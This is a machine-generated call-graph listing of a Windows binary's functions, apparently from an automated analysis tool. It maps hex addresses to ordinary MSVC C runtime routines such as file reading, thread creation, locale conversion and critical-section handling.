18561->18563 18579 ece8ba 18562->18579 18565 ece97a 18563->18565 18566 ece95b 18563->18566 18567 ed73cf __strnicoll MultiByteToWideChar 18565->18567 18578 ece8ec 18566->18578 18583 ece87b 18566->18583 18569 ece989 18567->18569 18570 ece990 GetLastError 18569->18570 18572 ece9b6 18569->18572 18574 ece87b 15 API calls 18569->18574 18588 ed34eb 18570->18588 18575 ed73cf __strnicoll MultiByteToWideChar 18572->18575 18572->18578 18574->18572 18577 ece9cd 18575->18577 18577->18570 18577->18578 18578->18403 18578->18404 18580 ece8c5 18579->18580 18581 ece8cd 18579->18581 18582 ed7347 ___free_lconv_mon 14 API calls 18580->18582 18581->18578 18582->18581 18584 ece8ba 14 API calls 18583->18584 18585 ece889 18584->18585 18593 ece85c 18585->18593 18596 ed34d8 18588->18596 18590 ed34f6 __dosmaperr 18594 ed7381 __fread_nolock 15 API calls 18593->18594 18595 ece869 18594->18595 18595->18578 18597 ed7724 __dosmaperr 14 API calls 18596->18597 18598 ed34dd 18597->18598 18598->18590 18619 ec8b60 18599->18619 18603 ec16ae 18602->18603 18604 ec16c2 GetCurrentThreadId 18603->18604 18605 ec96a8 std::_Throw_Cpp_error 30 API calls 18603->18605 18606 ec16dd 18604->18606 18607 ec16e9 18604->18607 18605->18604 18631 ec8c30 18619->18631 18621 ec8b8e std::_Throw_Cpp_error 18640 ed1131 18621->18640 18623 ec8bdd 18624 ec8bed 18623->18624 18625 ec8bfa 18623->18625 18655 ec42d0 18624->18655 18659 ec96a8 18625->18659 18628 ec8bf5 18629 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18628->18629 18630 ec17ad 18629->18630 18630->17569 18665 ec8e36 18631->18665 18638 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18639 ec8c8c 18638->18639 18639->18621 18641 ed113e 18640->18641 18642 ed1152 18640->18642 18644 ed34c5 __strnicoll 14 API calls 18641->18644 18692 ed11c2 18642->18692 18646 ed1143 18644->18646 18648 ed3bb0 __strnicoll 29 API calls 18646->18648 18647 ed1167 CreateThread 18650 ed1186 GetLastError 18647->18650 18653 ed1192 18647->18653 18709 ed1249 18647->18709 18649 ed114e 18648->18649 18649->18623 18651 ed34eb __dosmaperr 14 API calls 18650->18651 18651->18653 18701 ed1212 18653->18701 18656 ec42fc 18655->18656 18657 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18656->18657 18658 ec4309 18657->18658 18658->18628 18660 ec96be std::_Throw_Cpp_error 18659->18660 18930 ec96e3 18660->18930 18666 ec8e3b ___std_exception_copy 18665->18666 18667 ec8c58 18666->18667 18668 ed1650 std::ios_base::_Init 2 API calls 18666->18668 18669 ec8e57 18666->18669 18676 ec8d10 18667->18676 18668->18666 18670 ecb09b std::ios_base::_Init 18669->18670 18671 ec8e61 Concurrency::cancel_current_task 18669->18671 18672 ecc47a CallUnexpected RaiseException 18670->18672 18685 ecc47a 18671->18685 18674 ecb0b7 18672->18674 18675 ec97a4 18688 ec8a50 18676->18688 18679 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18680 ec8c6e 18679->18680 18681 ec4280 18680->18681 18682 ec42b0 18681->18682 18683 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18682->18683 18684 ec42bd 18683->18684 18684->18638 18686 ecc494 18685->18686 18687 ecc4c2 RaiseException 18685->18687 18686->18687 18687->18675 18689 ec8a79 18688->18689 18690 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18689->18690 18691 ec8a97 18690->18691 18691->18679 18693 ed8700 __Getctype 14 API calls 18692->18693 18694 ed11d3 18693->18694 18695 ed7347 ___free_lconv_mon 14 API calls 18694->18695 18696 ed11e0 18695->18696 18697 ed1204 18696->18697 18698 ed11e7 GetModuleHandleExW 18696->18698 18699 ed1212 16 API calls 18697->18699 18698->18697 18700 ed115e 18699->18700 18700->18647 18700->18653 18702 ed121e 18701->18702 18703 ed119d 18701->18703 18704 ed122d 18702->18704 18705 ed1224 CloseHandle 18702->18705 18703->18623 18706 ed123c 18704->18706 18707 ed1233 FreeLibrary 18704->18707 18705->18704 18708 ed7347 ___free_lconv_mon 14 API calls 18706->18708 18707->18706 18708->18703 18710 ed1255 ___scrt_is_nonwritable_in_current_image 18709->18710 18711 ed125c GetLastError ExitThread 18710->18711 18712 ed1269 18710->18712 18713 ed75d3 __Getctype 39 API calls 18712->18713 18714 ed126e 18713->18714 18726 edab1b 18714->18726 18717 ed1285 18730 ec88d0 18717->18730 18739 ec8ca0 18717->18739 18727 ed1279 18726->18727 18728 edab2b CallUnexpected 18726->18728 18727->18717 18748 ed8237 18727->18748 18728->18727 18754 ed82e0 18728->18754 18731 ec4280 5 API calls 18730->18731 18740 ec4280 5 API calls 18739->18740 18749 ed842d std::_Lockit::_Lockit 5 API calls 18748->18749 18755 ed842d std::_Lockit::_Lockit 5 API calls 18754->18755 18756 ed82fc 18755->18756 18756->18727 18931 ec96ef __EH_prolog3_GS 18930->18931 18932 ec1040 std::_Throw_Cpp_error 30 API calls 18931->18932 18933 ec9703 18932->18933 18940 ec32c0 18933->18940 18954 ec3470 18940->18954 18955 ec3494 std::_Throw_Cpp_error 18954->18955 18978 ec3a80 18955->18978 18991 ec1db0 18978->18991 18992 ec1dcb std::_Throw_Cpp_error 18991->18992 18993 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 18992->18993 20740 ec5060 20755 ec7620 20740->20755 20742 ec51c6 20764 ec77a0 20742->20764 20743 ec50c1 20743->20742 20761 ec7760 20743->20761 20746 ec5214 20771 ec65f0 20746->20771 20748 ec52ff std::_Throw_Cpp_error 20776 ec79d0 20748->20776 20756 ec7646 std::_Throw_Cpp_error 20755->20756 20810 ec81d0 20756->20810 20759 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20760 ec765b 20759->20760 20760->20743 20814 ed4c95 20761->20814 20763 ec778e 20763->20742 20765 ec77ba 20764->20765 20766 ec77df 20765->20766 20767 ec77c9 20765->20767 20856 ec8290 20766->20856 20852 ec8240 20767->20852 20770 ec77d7 20770->20746 20895 ec7580 20771->20895 20774 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20775 ec6649 20774->20775 20775->20748 20777 ec7a3b _strcspn 20776->20777 21177 ed51e4 20777->21177 20779 ec7b4a _strcspn 21182 ec3ec0 20779->21182 20781 ec7b85 std::ios_base::_Ios_base_dtor 21201 ec6660 20781->21201 20811 ec81fa std::_Throw_Cpp_error 20810->20811 20812 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20811->20812 20813 ec7651 20812->20813 20813->20759 20815 ed4ca4 20814->20815 20819 ed4cbb __floor_pentium4 20814->20819 20816 ed34c5 __strnicoll 14 API calls 20815->20816 20817 ed4ca9 20816->20817 20818 ed3bb0 __strnicoll 29 API calls 20817->20818 20821 ed4cb4 __startOneArgErrorHandling __floor_pentium4 20818->20821 20819->20821 20822 ee07a0 20819->20822 20821->20763 20823 ee07d9 __startOneArgErrorHandling 20822->20823 20825 ee0800 __startOneArgErrorHandling __floor_pentium4 20823->20825 20833 ee0c16 20823->20833 20826 ee0843 20825->20826 20827 ee081e 20825->20827 20845 ee08a2 20826->20845 20837 ee0b76 20827->20837 20830 ee083e __floor_pentium4 20831 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20830->20831 20832 ee0867 20831->20832 20832->20821 20834 ee0c41 __raise_exc 20833->20834 20835 ee0e3a RaiseException 20834->20835 20836 ee0e52 20835->20836 20836->20825 20838 ee0b83 20837->20838 20839 ee0b92 __floor_pentium4 20838->20839 20841 ee0bc1 __startOneArgErrorHandling __floor_pentium4 20838->20841 20840 ee08a2 __startOneArgErrorHandling 14 API calls 20839->20840 20842 ee0bab 20840->20842 20843 ee0c0f 20841->20843 20844 ee08a2 __startOneArgErrorHandling 14 API calls 20841->20844 20842->20830 20843->20830 20844->20843 20846 ee08af 20845->20846 20847 ee08c6 20845->20847 20849 ee08cb 20846->20849 20850 ed34c5 __strnicoll 14 API calls 20846->20850 20848 ed34c5 __strnicoll 14 API calls 20847->20848 20848->20849 20849->20830 20851 ee08be 20850->20851 20851->20830 20853 ec8268 std::_Throw_Cpp_error 20852->20853 20854 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20853->20854 20855 ec8286 20854->20855 20855->20770 20857 ec82c8 std::_Throw_Cpp_error 20856->20857 20858 ec8324 20856->20858 20860 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20857->20860 20862 ec8370 20858->20862 20861 ec8362 20860->20861 20861->20770 20863 ec1db0 std::_Throw_Cpp_error 5 API calls 20862->20863 20864 ec83a5 20863->20864 20865 ec83b6 20864->20865 20867 ec1e30 std::_Throw_Cpp_error 30 API calls 20864->20867 20880 ec3950 20865->20880 20867->20865 20868 ec83d6 std::_Throw_Cpp_error 20869 ec1f50 std::_Throw_Cpp_error 30 API calls 20868->20869 20870 ec83f9 std::_Throw_Cpp_error 20869->20870 20871 ec84a2 20870->20871 20873 ec842e std::_Throw_Cpp_error 20870->20873 20872 ef5e70 5 API calls 20871->20872 20878 ec8495 std::_Throw_Cpp_error 20872->20878 20885 ef5e70 20873->20885 20876 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20879 ec84e8 20876->20879 20878->20876 20879->20857 20881 ec1db0 std::_Throw_Cpp_error 5 API calls 20880->20881 20882 ec3967 20881->20882 20883 ec1eb0 std::_Throw_Cpp_error 5 API calls 20882->20883 20884 ec3980 20883->20884 20884->20868 20886 ef5ea8 std::_Throw_Cpp_error 20885->20886 20887 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20886->20887 20888 ec847c 20887->20888 20889 ec1960 20888->20889 20892 ec19e0 20889->20892 20893 ec1a10 std::_Throw_Cpp_error 29 API calls 20892->20893 20894 ec1987 20893->20894 20894->20878 20896 ec75b2 20895->20896 20899 ecf368 20896->20899 20898 ec6636 20898->20774 20900 ecf37c _Fputc 20899->20900 20903 ecf6ab 20900->20903 20902 ecf397 _Fputc 20902->20898 20904 ecf6da 20903->20904 20905 ecf6b7 20903->20905 20909 ecf701 20904->20909 20911 ecf849 20904->20911 20906 ed3d59 _Fputc 29 API calls 20905->20906 20910 ecf6d2 20906->20910 20908 ed3d59 _Fputc 29 API calls 20908->20910 20909->20908 20909->20910 20910->20902 20912 ecf898 20911->20912 20913 ecf875 20911->20913 20912->20913 20917 ecf8a0 20912->20917 20914 ed3d59 _Fputc 29 API calls 20913->20914 20915 ecf88d 20914->20915 20916 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20915->20916 20918 ecf9bb 20916->20918 20922 ecfaa5 20917->20922 20918->20909 20939 ecf74a 20922->20939 20924 ecf921 20936 ecf581 20924->20936 20925 ed3d59 _Fputc 29 API calls 20925->20924 20926 ecfaca 20926->20925 20931 ecfabf std::_Locinfo::_Locinfo_dtor 20931->20924 20931->20926 20932 ecfbce 20931->20932 20943 ecf4b0 20931->20943 20949 ecfd89 20931->20949 20952 ecfe01 20931->20952 20986 ecff5a 20931->20986 20933 ed3d59 _Fputc 29 API calls 20932->20933 20934 ecfbe8 20933->20934 20935 ed3d59 _Fputc 29 API calls 20934->20935 20935->20924 20937 ed7347 ___free_lconv_mon 14 API calls 20936->20937 20938 ecf591 20937->20938 20938->20915 20940 ecf76e 20939->20940 20941 ecf755 20939->20941 20940->20931 20942 ed3d59 _Fputc 29 API calls 20941->20942 20942->20940 20944 ecf4c0 20943->20944 21015 ed7c10 20944->21015 21023 ed071b 20949->21023 20951 ecfdc4 20951->20931 20953 ecfe1f 20952->20953 20954 ecfe08 20952->20954 20957 ed3d59 _Fputc 29 API calls 20953->20957 20963 ecfe5e 20953->20963 20955 ecffdf 20954->20955 20956 ecff7f 20954->20956 20954->20963 20958 ed0018 20955->20958 20959 ecffe4 20955->20959 20960 ed0005 20956->20960 20961 ecff85 20956->20961 20962 ecfe53 20957->20962 20964 ed001d 20958->20964 20965 ed0035 20958->20965 20966 ecffe6 20959->20966 20967 ed0011 20959->20967 21071 ed0c44 20960->21071 20973 ecffd6 20961->20973 20974 ecff8a 20961->20974 20962->20931 20963->20931 20964->20960 20964->20973 20985 ecffb0 20964->20985 21082 ed05d1 20965->21082 20968 ecff99 20966->20968 20976 ecfff5 20966->20976 21078 ed05b4 20967->21078 20984 ed003e 20968->20984 21046 ed0423 20968->21046 20973->20984 21060 ed092a 20973->21060 20974->20968 20977 ecffc3 20974->20977 20974->20985 20976->20960 20978 ecfff9 20976->20978 20977->20984 21056 ed02b9 20977->21056 20978->20984 21067 ed05e7 20978->21067 20980 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 20982 ed02b7 20980->20982 20982->20931 20984->20980 20985->20984 21085 eda81b 20985->21085 20987 ecffdf 20986->20987 20988 ecff7f 20986->20988 20989 ed0018 20987->20989 20990 ecffe4 20987->20990 20991 ed0005 20988->20991 20992 ecff85 20988->20992 20993 ed001d 20989->20993 20994 ed0035 20989->20994 20995 ecffe6 20990->20995 20996 ed0011 20990->20996 21000 ed0c44 30 API calls 20991->21000 21002 ecffd6 20992->21002 21003 ecff8a 20992->21003 20993->20991 20993->21002 21014 ecffb0 20993->21014 20999 ed05d1 30 API calls 20994->20999 20998 ecff99 20995->20998 21005 ecfff5 20995->21005 20997 ed05b4 30 API calls 20996->20997 20997->21014 21001 ed0423 42 API calls 20998->21001 21012 ed003e 20998->21012 20999->21014 21000->21014 21001->21014 21004 ed092a 30 API calls 21002->21004 21002->21012 21003->20998 21006 ecffc3 21003->21006 21003->21014 21004->21014 21005->20991 21007 ecfff9 21005->21007 21008 ed02b9 41 API calls 21006->21008 21006->21012 21010 ed05e7 29 API calls 21007->21010 21007->21012 21008->21014 21009 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21011 ed02b7 21009->21011 21010->21014 21011->20931 21012->21009 21013 eda81b 41 API calls 21013->21014 21014->21012 21014->21013 21016 ecf4dd 21015->21016 21017 ed7c27 21015->21017 21019 ed7c41 21016->21019 21017->21016 21018 edbc44 __Getctype 39 API calls 21017->21018 21018->21016 21020 ecf4ea 21019->21020 21021 ed7c58 21019->21021 21020->20931 21021->21020 21022 ed8f32 __strnicoll 39 API calls 21021->21022 21022->21020 21033 ed06a9 21023->21033 21025 ed072d 21026 ed0742 21025->21026 21029 ed0775 21025->21029 21032 ed075d std::_Locinfo::_Locinfo_dtor 21025->21032 21027 ed3d59 _Fputc 29 API calls 21026->21027 21027->21032 21028 ed080c 21030 ed06f2 29 API calls 21028->21030 21029->21028 21040 ed06f2 21029->21040 21030->21032 21032->20951 21034 ed06ae 21033->21034 21035 ed06c1 21033->21035 21036 ed34c5 __strnicoll 14 API calls 21034->21036 21035->21025 21037 ed06b3 21036->21037 21038 ed3bb0 __strnicoll 29 API calls 21037->21038 21039 ed06be 21038->21039 21039->21025 21041 ed0717 21040->21041 21042 ed0703 21040->21042 21041->21028 21042->21041 21043 ed34c5 __strnicoll 14 API calls 21042->21043 21044 ed070c 21043->21044 21045 ed3bb0 __strnicoll 29 API calls 21044->21045 21045->21041 21047 ed043d 21046->21047 21095 ecf9bd 21047->21095 21049 ed047c 21106 ed9d24 21049->21106 21052 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21053 ed0533 21052->21053 21054 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21053->21054 21055 ed0566 21053->21055 21054->21055 21055->20985 21055->21055 21057 ed02d4 21056->21057 21058 ed030a 21057->21058 21059 eda81b 41 API calls 21057->21059 21058->20985 21059->21058 21061 ed093f 21060->21061 21062 ed0961 21061->21062 21064 ed0988 21061->21064 21063 ed3d59 _Fputc 29 API calls 21062->21063 21066 ed097e 21063->21066 21065 ecf9bd 15 API calls 21064->21065 21064->21066 21065->21066 21066->20985 21070 ed05fd 21067->21070 21068 ed3d59 _Fputc 29 API calls 21069 ed061e 21068->21069 21069->20985 21070->21068 21070->21069 21072 ed0c59 21071->21072 21073 ed0c7b 21072->21073 21075 ed0ca2 21072->21075 21074 ed3d59 _Fputc 29 API calls 21073->21074 21077 ed0c98 21074->21077 21076 ecf9bd 15 API calls 21075->21076 21075->21077 21076->21077 21077->20985 21079 ed05c0 21078->21079 21170 ed0ab7 21079->21170 21081 ed05d0 21081->20985 21083 ed092a 30 API calls 21082->21083 21084 ed05e6 21083->21084 21084->20985 21086 eda830 21085->21086 21087 eda871 21086->21087 21088 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21086->21088 21090 eda85d std::invalid_argument::invalid_argument 21086->21090 21094 eda834 std::_Locinfo::_Locinfo_dtor std::invalid_argument::invalid_argument 21086->21094 21087->21090 21091 ed7491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 21087->21091 21087->21094 21088->21087 21089 ed3d59 _Fputc 29 API calls 21089->21094 21090->21089 21090->21094 21092 eda92c 21091->21092 21093 eda942 GetLastError 21092->21093 21092->21094 21093->21090 21093->21094 21094->20985 21096 ecf9e4 21095->21096 21097 ecf9d2 21095->21097 21096->21097 21098 ed7381 __fread_nolock 15 API calls 21096->21098 21097->21049 21099 ecfa08 21098->21099 21100 ecfa1b 21099->21100 21101 ecfa10 21099->21101 21125 ecf55d 21100->21125 21102 ed7347 ___free_lconv_mon 14 API calls 21101->21102 21102->21097 21105 ed7347 ___free_lconv_mon 14 API calls 21105->21097 21107 ed9d35 21106->21107 21108 ed9d59 21106->21108 21109 ed3d59 _Fputc 29 API calls 21107->21109 21108->21107 21110 ed9d8c 21108->21110 21122 ed050f 21109->21122 21111 ed9dc5 21110->21111 21113 ed9df4 21110->21113 21128 ed9ed9 21111->21128 21112 ed9e1d 21116 ed9e4a 21112->21116 21117 ed9e84 21112->21117 21113->21112 21114 ed9e22 21113->21114 21136 eda29b 21114->21136 21119 ed9e4f 21116->21119 21120 ed9e6a 21116->21120 21163 eda0c1 21117->21163 21146 eda74c 21119->21146 21156 eda6b6 21120->21156 21122->21052 21122->21053 21126 ed7347 ___free_lconv_mon 14 API calls 21125->21126 21127 ecf56c 21126->21127 21127->21105 21129 ed9eef 21128->21129 21130 ed9efa 21128->21130 21129->21122 21131 ed6fbc ___std_exception_copy 29 API calls 21130->21131 21132 ed9f55 21131->21132 21133 ed9f5f 21132->21133 21134 ed3bdd __Getctype 11 API calls 21132->21134 21133->21122 21135 ed9f6d 21134->21135 21137 eda2ae 21136->21137 21138 eda2bd 21137->21138 21139 eda2df 21137->21139 21140 ed3d59 _Fputc 29 API calls 21138->21140 21141 eda2f4 21139->21141 21143 eda347 21139->21143 21145 eda2d5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z std::invalid_argument::invalid_argument _strrchr __allrem 21140->21145 21142 eda0c1 41 API calls 21141->21142 21142->21145 21144 ecf4b0 std::_Locinfo::_Locinfo_dtor 39 API calls 21143->21144 21143->21145 21144->21145 21145->21122 21147 ee29f2 31 API calls 21146->21147 21148 eda77c 21147->21148 21149 ee2847 29 API calls 21148->21149 21150 eda7ba 21149->21150 21151 eda7c1 21150->21151 21152 eda7fa 21150->21152 21153 eda7d3 21150->21153 21151->21122 21154 ed9f6e 41 API calls 21152->21154 21155 eda5c8 39 API calls 21153->21155 21154->21151 21155->21151 21157 ee29f2 31 API calls 21156->21157 21158 eda6e5 21157->21158 21159 ee2847 29 API calls 21158->21159 21160 eda726 21159->21160 21161 eda72d 21160->21161 21162 eda5c8 39 API calls 21160->21162 21161->21122 21162->21161 21164 ee29f2 31 API calls 21163->21164 21165 eda0eb 21164->21165 21166 ee2847 29 API calls 21165->21166 21167 eda139 21166->21167 21168 eda140 21167->21168 21169 ed9f6e 41 API calls 21167->21169 21168->21122 21169->21168 21171 ed0acc 21170->21171 21172 ed0aee 21171->21172 21174 ed0b15 21171->21174 21173 ed3d59 _Fputc 29 API calls 21172->21173 21176 ed0b0b 21173->21176 21175 ecf9bd 15 API calls 21174->21175 21174->21176 21175->21176 21176->21081 21178 ed75d3 __Getctype 39 API calls 21177->21178 21179 ed51ef 21178->21179 21180 ed7bb6 __Getctype 39 API calls 21179->21180 21181 ed51ff 21180->21181 21181->20779 21183 ec91bd std::_Lockit::_Lockit 7 API calls 21182->21183 21184 ec3ee4 21183->21184 21241 ec4080 21184->21241 21186 ec3efa 21200 ec3f25 21186->21200 21249 ec41b0 21186->21249 21187 ec91ee std::_Lockit::~_Lockit 2 API calls 21189 ec3fb0 21187->21189 21191 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21189->21191 21193 ec3fba 21191->21193 21192 ec3f50 21195 ec4280 5 API calls 21192->21195 21193->20781 21196 ec3f64 21195->21196 21265 ec9261 21196->21265 21200->21187 21202 ec668c std::_Throw_Cpp_error 21201->21202 21501 ec6aa0 21202->21501 21242 ec40de 21241->21242 21243 ec40a2 21241->21243 21245 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21242->21245 21244 ec91bd std::_Lockit::_Lockit 7 API calls 21243->21244 21246 ec40b3 21244->21246 21247 ec40f0 21245->21247 21248 ec91ee std::_Lockit::~_Lockit 2 API calls 21246->21248 21247->21186 21248->21242 21250 ec422c 21249->21250 21251 ec41d0 21249->21251 21252 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 21250->21252 21251->21250 21253 ec8e36 std::ios_base::_Init 3 API calls 21251->21253 21254 ec3f42 21252->21254 21255 ec41e8 codecvt 21253->21255 21254->21192 21261 ec4250 21254->21261 21270 ec43b0 21255->21270 21262 ec4268 21261->21262 21263 ecc47a CallUnexpected RaiseException 21262->21263 21264 ec427d 21263->21264 21266 ec926c ___std_exception_copy 21265->21266 21267 ec3f72 21266->21267 21497 ec9788 21266->21497 21271 ec91bd std::_Lockit::_Lockit 7 API calls 21270->21271 21272 ec43d0 codecvt 21271->21272 21273 ec441f 21272->21273 21274 ec443b 21272->21274 21300 ec92e3 21273->21300 21309 ec97e5 21274->21309 21316 ed5217 21300->21316 21447 ec98d2 21309->21447 21502 ec1db0 std::_Throw_Cpp_error 5 API calls 21501->21502 22013 eca651 22014 eca665 22013->22014 22020 eca6c0 22014->22020 22021 eca8c5 22014->22021 22017 eca6ad 22017->22020 22031 ed4776 22017->22031 22024 eca8df 22021->22024 22025 eca92e 22021->22025 22022 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22023 eca690 22022->22023 22023->22017 22023->22020 22027 ed3575 22023->22027 22024->22025 22026 ed4dca 69 API calls 22024->22026 22025->22022 22026->22025 22028 ed3588 _Fputc 22027->22028 22045 ed37ee 22028->22045 22030 ed359d _Fputc 22030->22017 22032 ed4796 22031->22032 22033 ed4781 22031->22033 22035 ed479e 22032->22035 22036 ed47b3 22032->22036 22034 ed34c5 __strnicoll 14 API calls 22033->22034 22037 ed4786 22034->22037 22038 ed34c5 __strnicoll 14 API calls 22035->22038 22131 eddef3 22036->22131 22040 ed3bb0 __strnicoll 29 API calls 22037->22040 22041 ed47a3 22038->22041 22043 ed4791 22040->22043 22044 ed3bb0 __strnicoll 29 API calls 22041->22044 22042 ed47ae 22042->22020 22043->22020 22044->22042 22047 ed37fa ___scrt_is_nonwritable_in_current_image 22045->22047 22046 ed3800 22048 ed3d59 _Fputc 29 API calls 22046->22048 22047->22046 22049 ed3843 22047->22049 22055 ed381b 22048->22055 22056 ecf144 EnterCriticalSection 22049->22056 22051 ed384f 22057 ed3702 22051->22057 22053 ed3865 22068 ed388e 22053->22068 22055->22030 22056->22051 22058 ed3728 22057->22058 22059 ed3715 22057->22059 22071 ed3629 22058->22071 22059->22053 22061 ed374b 22064 ed3766 22061->22064 22067 ed37d9 22061->22067 22075 eddf29 22061->22075 22063 ed437f ___scrt_uninitialize_crt 64 API calls 22065 ed3779 22063->22065 22064->22063 22089 eddd0f 22065->22089 22067->22053 22130 ecf158 LeaveCriticalSection 22068->22130 22070 ed3896 22070->22055 22072 ed363a 22071->22072 22074 ed3692 22071->22074 22073 eddccf __fread_nolock 31 API calls 22072->22073 22072->22074 22073->22074 22074->22061 22076 ede2fb 22075->22076 22077 ede30a 22076->22077 22078 ede332 22076->22078 22079 ed3d59 _Fputc 29 API calls 22077->22079 22080 edaab8 __fread_nolock 29 API calls 22078->22080 22081 ede325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22079->22081 22082 ede33b 22080->22082 22081->22064 22092 eddd2d 22082->22092 22085 ede3fc 22085->22081 22107 ede130 22085->22107 22086 ede3e5 22095 eddf85 22086->22095 22090 edde70 __fread_nolock 31 API calls 22089->22090 22091 eddd28 22090->22091 22091->22067 22114 eddd4b 22092->22114 22096 eddf94 _Fputc 22095->22096 22097 edaab8 __fread_nolock 29 API calls 22096->22097 22098 eddfb0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22097->22098 22100 eddd2d 33 API calls 22098->22100 22106 eddfbc 22098->22106 22099 ec8eaa __ehhandler$___std_fs_change_permissions@12 5 API calls 22101 ede12e 22099->22101 22102 ede010 22100->22102 22101->22081 22103 ede042 ReadFile 22102->22103 22102->22106 22104 ede069 22103->22104 22103->22106 22105 eddd2d 33 API calls 22104->22105 22105->22106 22106->22099 22108 edaab8 __fread_nolock 29 API calls 22107->22108 22109 ede143 22108->22109 22110 eddd2d 33 API calls 22109->22110 22113 ede18d __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22109->22113 22111 ede1ea 22110->22111 22112 eddd2d 33 API calls 22111->22112 22111->22113 22112->22113 22113->22081 22116 eddd57 ___scrt_is_nonwritable_in_current_image 22114->22116 22115 eddd46 22115->22081 22115->22085 22115->22086 22116->22115 22117 eddd9a 22116->22117 22119 eddde0 22116->22119 22118 ed3d59 _Fputc 29 API calls 22117->22118 22118->22115 22125 edebd5 EnterCriticalSection 22119->22125 22121 eddde6 22122 edde07 22121->22122 22123 edde70 __fread_nolock 31 API calls 22121->22123 22126 edde68 22122->22126 22123->22122 22125->22121 22129 edebf8 LeaveCriticalSection 22126->22129 22128 edde6e 22128->22115 22129->22128 22130->22070 22132 eddf07 _Fputc 22131->22132 22135 ede49c 22132->22135 22134 eddf13 _Fputc 22134->22042 22136 ede4a8 ___scrt_is_nonwritable_in_current_image 22135->22136 22137 ede4af 22136->22137 22138 ede4d2 22136->22138 22139 ed3d59 _Fputc 29 API calls 22137->22139 22146 ecf144 EnterCriticalSection 22138->22146 22141 ede4c8 22139->22141 22141->22134 22142 ede4e0 22147 ede2fb 22142->22147 22144 ede4ef 22160 ede521 22144->22160 22146->22142 22148 ede30a 22147->22148 22149 ede332 22147->22149 22150 ed3d59 _Fputc 29 API calls 22148->22150 22151 edaab8 __fread_nolock 29 API calls 22149->22151 22152 ede325 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22150->22152 22153 ede33b 22151->22153 22152->22144 22154 eddd2d 33 API calls 22153->22154 22155 ede359 22154->22155 22155->22152 22156 ede3fc 22155->22156 22157 ede3e5 22155->22157 22156->22152 22159 ede130 33 API calls 22156->22159 22158 eddf85 34 API calls 22157->22158 22158->22152 22159->22152 22163 ecf158 LeaveCriticalSection 22160->22163 22162 ede529 22162->22141 22163->22162 22242 ecf234 22243 ed4311 ___scrt_uninitialize_crt 68 API calls 22242->22243 22244 ecf23c 22243->22244 22252 ed9bd7 22244->22252 22246 ecf241 22262 ed9c82 22246->22262 22249 ecf26b 22250 ed7347 ___free_lconv_mon 14 API calls 22249->22250 22251 ecf276 22250->22251 22253 ed9be3 ___scrt_is_nonwritable_in_current_image 22252->22253 22266 ed3ea8 EnterCriticalSection 22253->22266 22255 ed9c5a 22271 ed9c79 22255->22271 22257 ed9bee 22257->22255 22259 ed9c2e DeleteCriticalSection 22257->22259 22267 ed4169 22257->22267 22261 ed7347 ___free_lconv_mon 14 API calls 22259->22261 22261->22257 22263 ecf250 DeleteCriticalSection 22262->22263 22264 ed9c99 22262->22264 22263->22246 22263->22249 22264->22263 22265 ed7347 ___free_lconv_mon 14 API calls 22264->22265 22265->22263 22266->22257 22268 ed417c _Fputc 22267->22268 22274 ed4227 22268->22274 22270 ed4188 _Fputc 22270->22257 22346 ed3ebf LeaveCriticalSection 22271->22346 22273 ed9c66 22273->22246 22275 ed4233 ___scrt_is_nonwritable_in_current_image 22274->22275 22276 ed423d 22275->22276 22277 ed4260 22275->22277 22278 ed3d59 _Fputc 29 API calls 22276->22278 22284 ed4258 22277->22284 22285 ecf144 EnterCriticalSection 22277->22285 22278->22284 22280 ed427e 22286 ed4199 22280->22286 22282 ed428b 22300 ed42b6 22282->22300 22284->22270 22285->22280 22287 ed41c9 22286->22287 22288 ed41a6 22286->22288 22290 ed41c1 22287->22290 22291 ed437f ___scrt_uninitialize_crt 64 API calls 22287->22291 22289 ed3d59 _Fputc 29 API calls 22288->22289 22289->22290 22290->22282 22292 ed41e1 22291->22292 22293 ed9c82 14 API calls 22292->22293 22294 ed41e9 22293->22294 22295 edaab8 __fread_nolock 29 API calls 22294->22295 22296 ed41f5 22295->22296 22303 edecd1 22296->22303 22299 ed7347 ___free_lconv_mon 14 API calls 22299->22290 22345 ecf158 LeaveCriticalSection 22300->22345 22302 ed42bc 22302->22284 22305 edecfa 22303->22305 22309 ed41fc 22303->22309 22304 eded49 22306 ed3d59 _Fputc 29 API calls 22304->22306 22305->22304 22307 eded21 22305->22307 22306->22309 22310 eded74 22307->22310 22309->22290 22309->22299 22311 eded80 ___scrt_is_nonwritable_in_current_image 22310->22311 22318 edebd5 EnterCriticalSection 22311->22318 22313 eded8e 22314 ededbf 22313->22314 22319 edec31 22313->22319 22332 ededf9 22314->22332 22318->22313 22320 ede98c __fread_nolock 29 API calls 22319->22320 22322 edec41 22320->22322 22321 edec47 22335 ede9f6 